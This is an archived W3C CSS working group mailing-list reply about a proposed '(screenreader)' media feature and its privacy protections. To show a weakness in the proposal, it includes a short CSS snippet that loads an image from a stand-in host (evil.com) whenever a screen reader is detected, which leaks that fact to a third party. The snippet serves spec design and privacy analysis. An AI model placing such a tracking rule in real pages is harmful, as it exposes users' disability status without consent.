Re: [css-speech][css-content][mediaqueries] Making Generated Content Accessible from Florian Rivoal on 2014-12-02 (www-style@w3.org from December 2014)

From: Florian Rivoal <florian@rivoal.net>
Date: Tue, 2 Dec 2014 22:46:48 +0100
To: James Craig <jcraig@apple.com>
Cc: fantasai <fantasai.lists@inkedblade.net>, Alan Stearns <stearns@adobe.com>, www-style list <www-style@w3.org>, "Tab Atkins Jr." <jackalmage@gmail.com>, fantasai <fantasai@inkedblade.net>
Message-Id: <3AF64972-3AB0-405A-A37F-6FDBE937F0D7@rivoal.net>

> On 06 Nov 2014, at 20:51, James Craig <jcraig@apple.com> wrote:
> 
> [snip]
> 
>> On Nov 5, 2014, at 9:51 AM, fantasai <fantasai.lists@inkedblade.net> wrote:
>> 
>>> Speech media is mutually exclusive with screen media, so it *only* covers
>>> the DAISY case (linearized audio) and does not apply to any assistive
>>> technology
>> 
>> Then perhaps we need some new media type or query, or to redefine how 'speech'
>> works. I think it's important that CSS be able to target styles at the screen
>> reader. 
> 
> I also proposed a "(screenreader)" media feature [1] as part of IndieUI (where a privacy model is defined [2]) and would happily pass off that work to the CSS WG if the CSS MQ spec would add the ability to restrict access to certain media features. We discussed this last year in the CSS WG meeting at the 2013 TPAC in Shenzhen. Admittedly, I was remote and had trouble hearing some of the follow-up discussion.

Sorry for the slow answer. This sounds like a good idea, especially given the general direction taken by media queries to deprecate the media types and introduce relavant media features to replace them.

> It'd be problematic to offer an unprotected "(screenreader)" media feature because it would offer any web page the ability to detect with a high degree of certainty that a visitor has a particular physical disability. In my opinion, it would be a privacy an personal security nightmare to implement *unless* CSS were to implement a media feature privacy model similar to the one defined in IndieUI User Context.

I agree that a privacy protecting model is worth having for something like this. However, unless I am missing something, the privacy model you propose doesn’t provide adequate protection. What prevents authors form doing this:

<style>
@media (screenreader) { #snoop { background: url(http://www.evil.com/info-leak.gif); } }
</style>
<div id=“snoop”></div>


> 1. http://rawgit.com/w3c/indie-ui/master/src/indie-ui-context.html#userScreenReaderSettings
> 2. http://rawgit.com/w3c/indie-ui/master/src/indie-ui-context.html#privacy-model

Received on Tuesday, 2 December 2014 21:47:16 UTC